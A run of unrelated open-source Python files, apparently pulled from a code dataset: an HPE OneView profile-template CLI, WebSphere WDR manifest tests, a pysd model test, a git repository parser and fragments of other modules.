FlexNICs to the Operating System. Changing this setting may alter the order
of network interfaces in the Operating System. This option sets the 'Hide
Unused FlexNICs' to disabled, eight FlexNICs will be enumerated in the
Operating System as network interfaces for each Flex-10 or FlexFabric
adapter. Configuring Fibre Channel connections on a FlexFabric adapter may
enumerate two storage interfaces, reducing the number of network interfaces
to six. The default (this option is not selected) enables 'Hide Unused
FlexNICs' and may suppress enumeration of FlexNICs that do not correspond
to profile connections. FlexNICs are hidden in pairs, starting with the 4th
pair. For instance, if the 4th FlexNIC on either physical port corresponds
to a profile connection, all eight physical functions are enumerated. If a
profile connection corresponds to the 2nd FlexNIC on either physical port,
but no connection corresponds to the 3rd or 4th FlexNIC on either physical
port, only the 1st and 2nd physical functions are enumerated in the
Operating System.''')
parser.add_argument('-cl', dest='conn_list',
required=False,
help='''
File with list of connections for this profile in JSON format. This file
can be created with multiple calls to define-connection-list.py''')
parser.add_argument('-fw', dest='baseline', required=False,
help='''
SPP Baseline file name. e.g. SPP2013090_2013_0830_30.iso''')
parser.add_argument('-mb', dest='disable_manage_boot',
action='store_true',
help='''
Explicitly DISABLE Boot Order Management. This value is enabled by
default and required for Connection boot enablement. If this option is
disabled, then PXE and FC BfS settings are disabled within the entire
Server Profile.''')
parser.add_argument('-bo', dest='boot_order', required=False,
nargs='+',
help='''
Defines the order in which boot will be attempted on the available
devices. Please NOTE the supported boot order is server hardware type
specific. For Gen7 and Gen8 server hardware the possible values are 'CD',
'Floppy', 'USB', 'HardDisk', and 'PXE'. For Gen9 BL server hardware in
Legacy BIOS boot mode, the possible values are 'CD', 'USB', 'HardDisk',
and 'PXE'. For Gen9 BL server hardware in UEFI or UEFI Optimized boot
mode, only one value is allowed and must be either 'HardDisk' or 'PXE'.
For Gen9 DL server hardware in Legacy BIOS boot mode, the possible
values are 'CD', 'USB', 'HardDisk', and 'PXE'. For Gen9 DL server
hardware in UEFI or UEFI Optimized boot mode, boot order configuration
is not supported.
Server boot order defined as a list separated by spaces. For example:
Gen7/8 BIOS Default Boot Order:
-bo CD Floppy USB HardDisk PXE
Gen9 Legacy BIOS Boot Order:
-bo CD USB HardDisk PXE
Gen9 UEFI Default Boot Order:
-bo HardDisk
''')
parser.add_argument('-bm', dest='boot_mode', required=False,
choices=['UEFI', 'UEFIOptimized', 'BIOS'],
default='BIOS',
help='''
Specify the Gen9 Boot Environment.
Sets the boot mode as one of the following:
. UEFI
. UEFIOptimized
. BIOS
If you select UEFI or UEFI optimized for an HP ProLiant DL Gen9 rack
mount server, the remaining boot setting available is the PXE boot policy.
For the UEFI or UEFI optimized boot mode options, the boot mode choice
should be based on the expected OS and required boot features for the
server hardware. UEFI optimized boot mode reduces the time the system
spends in POST(Video driver initialization). In order to select the
appropriate boot mode, consider the following:
. If a secure boot is required, the boot mode must be set to UEFI
or UEFI optimized .
. For operating systems that do not support UEFI (such as DOS, or
older versions of Windows and Linux), the boot mode must be set
to BIOS.
. When booting in UEFI mode, Windows 7, Server 2008, or 2008 R2
should not be set to UEFIOptimized.''')
parser.add_argument('-px', dest='pxe', required=False,
choices=['Auto', 'IPv4', 'IPv6',
'IPv4ThenIPv6', 'IPv6ThenIPv4'],
default='IPv4',
help='''
Controls the ordering of the network modes available to the Flexible
LOM (FLB); for example, IPv4 and IPv6.
Select from the following policies:
. Auto
. IPv4 only
. IPv6 only
. IPv4 then IPv6
. IPv6 then IPv4
Setting the policy to Auto means the order of the existing network boot
targets in the UEFI Boot Order list will not be modified, and any new
network boot targets will be added to the end of the list using the
System ROM's default policy.''')
args = parser.parse_args()
credential = {'userName': args.user, 'password': args.passwd}
con = hpov.connection(args.host)
srv = hpov.servers(con)
sts = hpov.settings(con)
if args.proxy:
con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
if args.cert:
con.set_trusted_ssl_bundle(args.cert)
login(con, credential)
acceptEULA(con)
eg_uri = get_eg_uri_from_arg(srv, args.enc_group)
sht = get_sht_from_arg(srv, args.server_hwt)
fw_settings = profile.make_firmware_dict(sts, args.baseline)
boot, bootmode = profile.make_boot_settings_dict(srv, sht, args.disable_manage_boot,
args.boot_order, args.boot_mode, args.pxe)
define_profile_template(srv,
args.name,
args.desc,
args.sp_desc,
sht['uri'],
eg_uri,
args.affinity,
args.hide_flexnics,
args.conn_list,
fw_settings,
boot,
bootmode)
if __name__ == '__main__':
import argparse
sys.exit(main())
|
data/OfflineIMAP/imapfw/imapfw/mmp/folder.py
|
from imapfw import runtime
from .manager import Manager
class FolderManager(Manager):
def __init__(self):
super(FolderManager, self).__init__()
self.rascal = runtime.rascal
|
data/LibraryOfCongress/chronam/core/management/commands/index_pages.py
|
from django.core.management.base import BaseCommand
from chronam.core.management.commands import configure_logging
from chronam.core.index import index_pages
configure_logging("index_pages_logging.config", "index_pages.log")
class Command(BaseCommand):
def handle(self, **options):
index_pages()
|
data/WDR/WDR/lib/tests/wdrtest/manifest.py
|
import unittest
import string
import wdr
from wdr.app import *
from wdr.config import *
from wdr.control import *
from wdr.manifest import *
from wdr.util import *
from wdrtest.topology import topology
(
AdminApp, AdminConfig, AdminControl, AdminTask, Help
) = wdr.WsadminObjects().getObjects()
class AbstractConfigTest(unittest.TestCase):
def tearDown(self):
reset()
def assertTrue(self, value, msg=None):
self.assertNotEqual(0, value, msg)
def assertFalse(self, value, msg=None):
self.assertEqual(0, value, msg)
def assertNone(self, value, msg=None):
if value is not None:
raise AssertionError(msg or '%s not None' % value)
def assertNotNone(self, value, msg=None):
if value is None:
raise AssertionError(msg or '%s not None' % value)
class VariableSubstitutionTest(unittest.TestCase):
def testSimple(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[name]!', {'name': 'world'})
)
def testWithMixedCase(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[Name]!', {'Name': 'world'})
)
def testWithDigits(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[name0]!', {'name0': 'world'})
)
def testWithUnderscores(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[the_name]!', {'the_name': 'world'})
)
def testWithUnderscorePrefix(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[_name]!', {'_name': 'world'})
)
def testWithUnderscoreOnly(self):
self.assertEquals(
'Hello world!',
substituteVariables('Hello $[_]!', {'_': 'world'})
)
def testWithNestedDictionary(self):
self.assertEquals(
'Hello world!',
substituteVariables(
'Hello $[person.name]!', {'person': {'name': 'world'}}
)
)
def testWithDoubleNestedDictionary(self):
self.assertEquals(
'Hello John Peter Smith!',
substituteVariables(
'Hello '
'$[person.name.first] '
'$[person.name.second] '
'$[person.name.last]!',
{
'person': {
'name': {
'first': 'John',
'second': 'Peter',
'last': 'Smith',
}
}
}
)
)
def testNone(self):
self.assertEquals(
'Hello !',
substituteVariables('Hello $[name]!', {'name': None})
)
def testNumber(self):
self.assertEquals(
'Hello 123!',
substituteVariables('Hello $[name]!', {'name': 123})
)
def testList(self):
self.assertEquals(
'Hello [123, 456]!',
substituteVariables('Hello $[name]!', {'name': [123, 456]})
)
def testTuple(self):
self.assertEquals(
'Hello (123, 456)!',
substituteVariables('Hello $[name]!', {'name': (123, 456)})
)
def testCallable(self):
self.assertEquals(
'Hello world!',
substituteVariables(
'Hello $[name]!',
{'name': lambda expression, variables: 'world'}
)
)
def testCallableReturningNone(self):
self.assertEquals(
'Hello !',
substituteVariables(
'Hello $[name]!',
{'name': lambda expression, variables: None}
)
)
def testWithExtraSpaces(self):
self.assertEquals(
'Hello world!',
substituteVariables(
'Hello $[ person.name ]!',
{'person': {'name': 'world'}}
)
)
class VariableSubstitutionWithFilteringTest(unittest.TestCase):
def testUpper(self):
self.assertEquals(
'Hello WORLD!',
substituteVariables(
'Hello $[name|upper]!',
{'name': 'world', 'upper': string.upper}
)
)
def testListProcessing(self):
self.assertEquals(
'Hello John Smith!',
substituteVariables(
'Hello $[name|join]!',
{'name': ['John', 'Smith'], 'join': string.join}
)
)
def testListWithLambdaOnList(self):
self.assertEquals(
'deploymentTargets are '
'['
'WebSphere'
':cell=wdrCell,cluster=wdrCluster+WebSphere'
':cell=wdrCell,node=httpNode01,server=httpServer01'
']',
substituteVariables(
'deploymentTargets are '
'[$[deploymentTargets|joinDeploymentTargets]]',
{
'deploymentTargets': [
[
['cell', 'wdrCell'],
['cluster', 'wdrCluster'],
],
[
['cell', 'wdrCell'],
['node', 'httpNode01'],
['server', 'httpServer01'],
]
],
'joinDeploymentTargets':
lambda targetList: ('+'.join(
[
'WebSphere:'
+ ','.join(
['='.join(attList) for attList in target]
)
for target in targetList
]
)
)
}
)
)
def testListWithLambdaOnDict(self):
self.assertEquals(
'deploymentTargets are '
'['
'WebSphere'
':cell=wdrCell,cluster=wdrCluster+WebSphere'
':cell=wdrCell,node=httpNode01,server=httpServer01'
']',
substituteVariables(
'deploymentTargets are '
'[$[deploymentTargets|joinDeploymentTargets]]',
{
'deploymentTargets': [
{
'cell': 'wdrCell',
'cluster': 'wdrCluster',
},
{
'cell': 'wdrCell',
'node': 'httpNode01',
'server': 'httpServer01',
}
],
'joinDeploymentTargets':
lambda targetList: (
'+'.join(
[
'WebSphere:cell=%(cell)s,cluster=%(cluster)s'
% t
for t in filter(
lambda e: e.get('cluster'), targetList
)
]
+
[
'WebSphere'
':cell=%(cell)s,node=%(node)s,server=%(server)s'
% t
for t in filter(
lambda e: e.get('node') and e.get('server'),
targetList
)
]
)
)
}
)
)
def testWithExtraSpaces(self):
self.assertEquals(
'Hello WORLD!',
substituteVariables(
'Hello $[ name | upper ]!',
{'name': 'world', 'upper': string.upper}
)
)
class BasicManifestImportTest(AbstractConfigTest):
def testUpdateStrings(self):
"""Modifying single string attribute"""
srv = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
importConfigurationManifest(
'wdrtest/manifests/basic/string_attribute_change.wdrc', topology
)
self.assertEquals(srv.changeUserAfterStartup, 'vagrant')
self.assertEquals(srv.changeGroupAfterStartup, 'vagrant')
def testUpdateBooleans(self):
"""Modifying boolean attributes"""
srv = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
self.assertFalse(srv.developmentMode)
self.assertTrue(srv.parallelStartEnabled)
importConfigurationManifest(
'wdrtest/manifests/basic/boolean_attribute_change.wdrc', topology
)
self.assertTrue(srv.developmentMode)
self.assertFalse(srv.parallelStartEnabled)
def testUpdateBooleanWithInvalidValue(self):
"""Attempting to assign invalid value to a boolean attribute"""
srv = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
self.assertTrue(srv.parallelStartEnabled)
importConfigurationManifest(
'wdrtest/manifests/basic/boolean_attribute_invalid.wdrc', topology
)
self.assertFalse(srv.developmentMode)
def testUpdateInteger(self):
"""Updating integer attribute"""
jvm = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:/'
% topology
)
self.assertEquals(jvm.initialHeapSize, 0)
self.assertEquals(jvm.maximumHeapSize, 0)
importConfigurationManifest(
'wdrtest/manifests/basic/integer_attribute_change.wdrc', topology
)
self.assertEquals(jvm.initialHeapSize, 12345)
self.assertEquals(jvm.maximumHeapSize, 67890)
def testUpdateEnum(self):
"""Updating enum attribute"""
cell = getid1(
'/Cell:%(cellName)s/'
% topology
)
self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')
importConfigurationManifest(
'wdrtest/manifests/basic/enum_attribute_change.wdrc', topology
)
self.assertEquals(cell.cellDiscoveryProtocol, 'UDP')
def testUpdateEnumWithInvalidValue(self):
"""Attempting to assign invalid enum value to an attribute"""
cell = getid1(
'/Cell:%(cellName)s/'
% topology
)
self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')
failure = 0
try:
importConfigurationManifest(
'wdrtest/manifests/basic/enum_attribute_invalid.wdrc', topology
)
failure = 1
except:
pass
self.assertFalse(failure, 'should fail on invalid enum value')
self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')
def testFailOnInvalidType(self):
"""Attempting use invalid object type"""
failure = 0
try:
importConfigurationManifest(
'wdrtest/manifests/basic/fail_on_invalid_type.wdrc', topology
)
failure = 1
except:
pass
self.assertFalse(failure, 'should fail on invalid type')
def testFailOnInvalidKey(self):
"""Attempting use invalid object attribute in key"""
failure = 0
try:
importConfigurationManifest(
'wdrtest/manifests/basic/fail_on_invalid_key.wdrc', topology
)
failure = 1
except:
pass
self.assertFalse(failure, 'should fail on invalid key')
def testFailOnInvalidAttribute(self):
"""Attempting use invalid object attribute"""
failure = 0
try:
importConfigurationManifest(
'wdrtest/manifests/basic/fail_on_invalid_attribute.wdrc',
topology
)
failure = 1
except:
pass
self.assertFalse(failure, 'should fail on invalid attribute')
def testCommentsValid(self):
"""Comments in manifests"""
importConfigurationManifest(
'wdrtest/manifests/basic/comments_valid.wdrc', topology
)
def testCommentIndented(self):
importConfigurationManifest(
'wdrtest/manifests/basic/comment_indented.wdrc', topology
)
self.assertFalse(hasChanges())
def testNoChanges(self):
importConfigurationManifest(
'wdrtest/manifests/basic/no_changes.wdrc', topology
)
self.assertFalse(hasChanges())
class HierarchiesManifestImportTest(AbstractConfigTest):
def testOneChild(self):
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(providers, [])
importConfigurationManifest(
'wdrtest/manifests/hierarchies/one_child.wdrc', topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(len(providers), 1)
db2provider = providers[0]
self.assertEquals(db2provider.name, 'DB2 Provider')
self.assertEquals(db2provider.classpath, ['a', 'b', 'c'])
self.assertTrue(db2provider.xa)
def testMultipleChildren(self):
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(providers, [])
importConfigurationManifest(
'wdrtest/manifests/hierarchies/multiple_children.wdrc', topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(len(providers), 2)
db2provider = providers[0]
self.assertEquals(db2provider.name, 'DB2 Provider')
self.assertEquals(db2provider.classpath, ['a', 'b', 'c'])
self.assertFalse(db2provider.xa)
db2provider = providers[1]
self.assertEquals(db2provider.name, 'MS SQL Provider')
self.assertEquals(db2provider.classpath, ['d', 'e', 'f'])
self.assertTrue(db2provider.xa)
def testMultipleChildrenInList(self):
cellVariables = getid1(
'/Cell:%(cellName)s/VariableMap:/'
% topology
)
variableCount = len(cellVariables.entries)
importConfigurationManifest(
'wdrtest/manifests/hierarchies/multiple_children_in_list.wdrc',
topology
)
self.assertEquals(len(cellVariables.entries), variableCount+2)
def testMultipleChildrenInAttribute(self):
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(providers, [])
importConfigurationManifest(
'wdrtest/manifests/hierarchies/multiple_children_in_attribute.wdrc',
topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(len(providers), 1)
db2provider = providers[0]
self.assertEquals(db2provider.name, 'DB2 Provider')
self.assertEquals(len(db2provider.propertySet.resourceProperties), 2)
def testRepeatedObjects(self):
importConfigurationManifest(
'wdrtest/manifests/hierarchies/repeated_objects.wdrc', topology
)
server = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
referenceList = server.lookup1(
'CustomService',
{
'displayName': 'first',
},
'customServices'
)
class IncludesAndImportsTest(AbstractConfigTest):
def testImportValid(self):
cellVariables = getid1(
'/Cell:%(cellName)s/VariableMap:/'
% topology
)
variableCount = len(cellVariables.entries)
importConfigurationManifest(
'wdrtest/manifests/imports/import_valid.wdrc', topology
)
self.assertEquals(len(cellVariables.entries), variableCount + 2)
def testIncludeWithPath(self):
cellVariables = getid1(
'/Cell:%(cellName)s/VariableMap:/'
% topology
)
variableCount = len(cellVariables.entries)
importConfigurationManifest(
'wdrtest/manifests/imports/include_with_path.wdrc', topology
)
self.assertEquals(len(cellVariables.entries), variableCount + 3)
def testIncludeWithoutPath(self):
cellVariables = getid1(
'/Cell:%(cellName)s/VariableMap:/'
% topology
)
variableCount = len(cellVariables.entries)
importConfigurationManifest(
'wdrtest/manifests/imports/include_without_path.wdrc', topology
)
self.assertEquals(len(cellVariables.entries), variableCount + 2)
class VariablesAndFiltersTest(AbstractConfigTest):
def testCallables(self):
d = {}
d.update(topology)
d['list'] = ['a', 'b', 'c', 'd']
d['first'] = lambda x: x[0]
d['last'] = lambda x: x[-1]
cellVariables = getid1(
'/Cell:%(cellName)s/VariableMap:/'
% topology
)
variableCount = len(cellVariables.entries)
importConfigurationManifest(
'wdrtest/manifests/vars/callables.wdrc',
d
)
self.assertEquals(len(cellVariables.entries), variableCount + 2)
self.assertEquals(cellVariables.entries[-2].symbolicName, 'a')
self.assertEquals(cellVariables.entries[-2].value, 'val1')
self.assertEquals(cellVariables.entries[-1].symbolicName, 'd')
self.assertEquals(cellVariables.entries[-1].value, 'val2')
class ReferencesTest(AbstractConfigTest):
def testMailProtocolProvider(self):
"""Assigning reference to attribute"""
smtpProtocol = getid1(
'/Cell:%(cellName)s/MailProvider:Built-in Mail Provider/'
% topology
).lookup1(
'ProtocolProvider',
{
'protocol': 'smtp',
},
'protocolProviders'
)
importConfigurationManifest(
'wdrtest/manifests/references/mail_protocol_provider.wdrc', topology
)
mailSession = getid1(
'/Cell:%(cellName)s'
'/MailProvider:Built-in Mail Provider'
'/MailSession:test mail session'
% topology
)
self.assertEquals(
str(mailSession.mailTransportProtocol), str(smtpProtocol)
)
self.assertEquals(mailSession.name, 'test mail session')
self.assertEquals(mailSession.jndiName, 'mail/test')
self.assertEquals(mailSession.mailTransportHost, 'smtp.example.com')
def testDependentService(self):
"""Assigning multiple references to attribute"""
importConfigurationManifest(
'wdrtest/manifests/references/dependent_service.wdrc', topology
)
server = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
referenceList = server.lookup1(
'CustomService',
{
'displayName': 'with dependencies',
},
'customServices'
).prerequisiteServices
self.assertEquals(len(referenceList), 3)
self.assertEquals(referenceList[0].displayName, 'first')
self.assertEquals(referenceList[1].displayName, 'second')
self.assertEquals(referenceList[2].displayName, 'fifth')
def testDependentServiceExtension(self):
"""Assigning more references to an attribute"""
importConfigurationManifest(
'wdrtest/manifests/references/dependent_service.wdrc', topology
)
importConfigurationManifest(
'wdrtest/manifests/references/dependent_service2.wdrc', topology
)
server = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
referenceList = server.lookup1(
'CustomService',
{
'displayName': 'with dependencies',
},
'customServices'
).prerequisiteServices
self.assertEquals(len(referenceList), 5)
self.assertEquals(referenceList[0].displayName, 'first')
self.assertEquals(referenceList[1].displayName, 'second')
self.assertEquals(referenceList[2].displayName, 'fifth')
self.assertEquals(referenceList[3].displayName, 'third')
self.assertEquals(referenceList[4].displayName, 'fourth')
class RemovalTest(AbstractConfigTest):
def testJdbcProvider(self):
"""Removing JDBCProvider - a child of another object (Server)"""
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider/'
% topology
)
self.assertEquals(len(providers), 1)
importConfigurationManifest(
'wdrtest/manifests/removal/jdbc_provider.wdrc', topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider/'
% topology
)
self.assertEquals(len(providers), 0)
def testJvmProperty(self):
"""Removing Property from JavaVirtualMachine.systemProperties"""
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 1)
importConfigurationManifest(
'wdrtest/manifests/removal/jvm_property.wdrc', topology
)
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 0)
def testMailTransportProtocol(self):
"""Removing reference from MailSession.mailTransportProtocol"""
smtpProtocol = getid1(
'/Cell:%(cellName)s/MailProvider:Built-in Mail Provider/'
% topology
).lookup1(
'ProtocolProvider',
{
'protocol': 'smtp',
},
'protocolProviders'
)
importConfigurationManifest(
'wdrtest/manifests/removal/mail_protocol_provider.wdrc', topology
)
mailSession = getid1(
'/Cell:%(cellName)s'
'/MailProvider:Built-in Mail Provider'
'/MailSession:test mail session/'
% topology
)
self.assertEquals(
str(mailSession.mailTransportProtocol), str(smtpProtocol)
)
importConfigurationManifest(
'wdrtest/manifests/removal/mail_protocol_provider2.wdrc', topology
)
self.assertNone(mailSession.mailTransportProtocol)
def testDependentService(self):
"""Removing one of CustomService.prerequisiteServices references"""
importConfigurationManifest(
'wdrtest/manifests/removal/dependent_service.wdrc', topology
)
importConfigurationManifest(
'wdrtest/manifests/removal/dependent_service2.wdrc', topology
)
server = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
% topology
)
referenceList = server.lookup1(
'CustomService',
{
'displayName': 'with dependencies',
},
'customServices'
).prerequisiteServices
self.assertEquals(len(referenceList), 2)
self.assertEquals(referenceList[0].displayName, 'first')
self.assertEquals(referenceList[1].displayName, 'fifth')
class CustomizeTest(AbstractConfigTest):
def testJvmProperty(self):
"""Customize existing Property in JavaVirtualMachine.systemProperties"""
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 1)
self.assertEquals(prop[0].value, 'off')
importConfigurationManifest(
'wdrtest/manifests/customize/jvm_property.wdrc', topology
)
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 1)
self.assertEquals(prop[0].value, 'on')
def testMissingJvmProperty(self):
"""Customize missing Property in JavaVirtualMachine.systemProperties"""
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 1)
prop[0].remove()
importConfigurationManifest(
'wdrtest/manifests/customize/jvm_property.wdrc', topology
)
prop = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JavaProcessDef:/JavaVirtualMachine:'
'/Property:com.ibm.security.jgss.debug/'
% topology
)
self.assertEquals(len(prop), 0)
def testExistingDataSource(self):
"""Customize existing DataSource's attributes"""
dataSource = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider'
'/DataSource:Default Datasource/'
% topology
)
self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
importConfigurationManifest(
'wdrtest/manifests/customize/data_source.wdrc', topology
)
self.assertEquals(dataSource.jndiName, 'DefaultDatasource_WDR')
def testNonexistentDataSource(self):
"""Customize missing DataSource"""
provider = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider/'
% topology
)
dataSource = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider'
'/DataSource:Default Datasource/'
% topology
)
self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
self.assertEquals(
provider.description, 'Derby embedded non-XA JDBC Provider'
)
dataSource.remove()
importConfigurationManifest(
'wdrtest/manifests/customize/data_source.wdrc', topology
)
dataSources = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider'
'/DataSource:Default Datasource/'
% topology
)
self.assertEquals(len(dataSources), 1)
self.assertEquals(dataSources[0].jndiName, 'DefaultDatasource_WDR')
self.assertEquals(
provider.description, 'customized'
)
def testNonexistentProvider(self):
"""Customize missing DataSource"""
provider = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider/'
% topology
)
dataSource = getid1(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider'
'/DataSource:Default Datasource/'
% topology
)
self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
provider.remove()
importConfigurationManifest(
'wdrtest/manifests/customize/data_source.wdrc', topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider/'
% topology
)
self.assertEquals(providers, [])
dataSources = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
'/JDBCProvider:Derby JDBC Provider'
'/DataSource:Default Datasource/'
% topology
)
self.assertEquals(dataSources, [])
class TemplatesTest(AbstractConfigTest):
def test_db2_ibm_jcc_xa(self):
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(providers, [])
importConfigurationManifest(
'wdrtest/manifests/templates/db2_ibm_jcc_xa.wdrc', topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(len(providers), 1)
db2provider = providers[0]
self.assertEquals(
db2provider.name,
'Template based provider'
)
self.assertEquals(
db2provider.description,
'Created from "DB2 Using IBM JCC Driver (XA)" template'
)
self.assertEquals(
db2provider.providerType, 'DB2 Using IBM JCC Driver (XA)'
)
self.assertTrue(db2provider.xa)
def test_db2_ibm_jcc_xa_using_full_id(self):
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(providers, [])
importConfigurationManifest(
'wdrtest/manifests/templates/db2_ibm_jcc_xa_using_full_id.wdrc',
topology
)
providers = getid(
'/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
% topology
)
self.assertEquals(len(providers), 1)
db2provider = providers[0]
self.assertEquals(
db2provider.name,
'Template based provider'
)
self.assertEquals(
db2provider.description,
'Created from "DB2 Using IBM JCC Driver (XA)" template'
)
self.assertEquals(
db2provider.providerType, 'DB2 Using IBM JCC Driver (XA)'
)
self.assertTrue(db2provider.xa)
def test_non_unique_template(self):
try:
importConfigurationManifest(
'wdrtest/manifests/templates/non_unique_template.wdrc',
topology
)
except:
return
self.fail('non-unique template name should raise exception')
def test_web_server(self):
self.assertEqual(0, len(getid('/Server:DefaultServerFromTemplate/')))
importConfigurationManifest(
'wdrtest/manifests/templates/default_server.wdrc',
topology
)
self.assertEqual(1, len(getid('/Server:DefaultServerFromTemplate/')))
def test_non_existent_template(self):
try:
importConfigurationManifest(
'wdrtest/manifests/templates/non_existent_template.wdrc',
topology
)
except:
return
self.fail('non-unique template name should raise exception')
|
data/JamesPHoughton/pysd/tests/test-models-master/tests/exp/test_exp.py
|
from __future__ import division
import numpy as np
from pysd import functions
def time():
return _t
def flowa():
"""
Type: Flow or Auxiliary
"""
return 0.1
def stocka():
return _state['stocka']
def _stocka_init():
return -5
def _dstocka_dt():
return flowa()
def test_exp():
"""
Type: Flow or Auxiliary
"""
return np.exp(stocka())
def final_time():
"""
Type: Flow or Auxiliary
"""
return 100
def initial_time():
"""
Type: Flow or Auxiliary
"""
return 0
def saveper():
"""
Type: Flow or Auxiliary
"""
return time_step()
def time_step():
"""
Type: Flow or Auxiliary
"""
return 1
|
data/Yelp/git-code-debt/git_code_debt/repo_parser.py
|
from __future__ import absolute_import
from __future__ import unicode_literals
import collections
import contextlib
import shutil
import subprocess
import tempfile
from git_code_debt.util.iter import chunk_iter
from git_code_debt.util.subprocess import cmd_output
Commit = collections.namedtuple('Commit', ['sha', 'date'])
COMMIT_FORMAT = '--format=%H%n%ct'
class RepoParser(object):
def __init__(self, git_repo):
self.git_repo = git_repo
self.tempdir = None
@contextlib.contextmanager
def repo_checked_out(self):
assert not self.tempdir
self.tempdir = tempfile.mkdtemp(suffix='temp-repo')
try:
subprocess.check_call(
(
'git', 'clone',
'--no-checkout', '--shared',
self.git_repo, self.tempdir,
),
stdout=None,
)
yield
finally:
shutil.rmtree(self.tempdir)
self.tempdir = None
def get_commit(self, sha):
output = cmd_output(
'git', 'show', COMMIT_FORMAT, sha,
cwd=self.tempdir,
)
sha, date = output.splitlines()[:2]
return Commit(sha, int(date))
def get_commits(self, since_sha=None):
"""Returns a list of Commit objects.
Args:
since_sha - (optional) A sha to search from
"""
assert self.tempdir
cmd = ['git', 'log', '--first-parent', '--reverse', COMMIT_FORMAT]
if since_sha:
commits = [self.get_commit(since_sha)]
cmd.append('{0}..HEAD'.format(since_sha))
else:
commits = []
cmd.append('HEAD')
output = cmd_output(*cmd, cwd=self.tempdir)
for sha, date in chunk_iter(output.splitlines(), 2):
commits.append(Commit(sha, int(date)))
return commits
def get_original_commit(self, sha):
assert self.tempdir
output = cmd_output(
'git', 'show', sha, cwd=self.tempdir, encoding=None,
)
return output
def get_commit_diff(self, previous_sha, sha):
assert self.tempdir
output = cmd_output(
'git', 'diff', previous_sha, sha, cwd=self.tempdir, encoding=None,
)
return output
|
data/WoLpH/python-statsd/statsd/client.py
|
import logging
import statsd
from . import compat
class Client(object):
'''Statsd Client Object
